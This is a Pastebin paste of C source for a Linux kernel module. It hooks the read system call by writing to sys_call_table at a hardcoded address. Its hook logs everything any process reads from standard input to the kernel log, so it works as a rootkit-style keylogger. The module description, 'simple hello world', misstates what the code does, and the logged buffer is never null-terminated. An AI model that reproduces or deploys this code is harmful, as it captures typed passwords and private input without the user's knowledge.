Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #include <linux/module.h>
- #include <linux/kernel.h>
- #include <linux/unistd.h>
- #include <asm/atomic.h>
- #include <linux/sched.h>
- #include <asm/uaccess.h>
- typedef asmlinkage ssize_t (*sys_read_t)(unsigned int fd, char __user * buf, size_t count);
- // Global variables
- void **sys_call_table = NULL;
- sys_read_t sys_read_original = NULL;
- atomic_t counter_unload;
- asmlinkage ssize_t sys_read_hooked(unsigned int fd, char __user * buf, size_t count)
- {
- ssize_t ret;
- char *local_buf;
- atomic_inc(&counter_unload);
- ret = sys_read_original(fd, buf, count);
- if(ret > 0){
- if(fd == 0){
- local_buf = kmalloc(ret+1, GFP_KERNEL);
- if(local_buf == NULL) goto out;
- if(copy_from_user(local_buf, buf, ret)){
- printk(KERN_EMERG "ALARM\n");
- }else{
- printk("%s said: %s\n", current->comm, local_buf);
- }
- kfree(local_buf);
- }
- }
- out:
- atomic_dec(&counter_unload);
- return ret;
- }
- int init_module(void)
- {
- printk(KERN_INFO "Hello World\n");
- atomic_set(&counter_unload, 0);
- sys_call_table = 0xc02bfaa0;
- printk("saving orig sys_read\n");
- sys_read_original = sys_call_table[__NR_read];
- printk("hooking sys_read\n");
- sys_call_table[__NR_read] = sys_read_hooked;
- return 0;
- }
- void cleanup_module(void)
- {
- printk("restoring original sys_read\n");
- sys_call_table[__NR_read] = sys_read_original;
- while(atomic_read(&counter_unload) > 0){
- printk("......\n");
- schedule();
- }
- printk(KERN_INFO "k thx bye\n");
- }
- MODULE_LICENSE("GPL");
- MODULE_AUTHOR("");
- MODULE_DESCRIPTION("simple hello world");
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
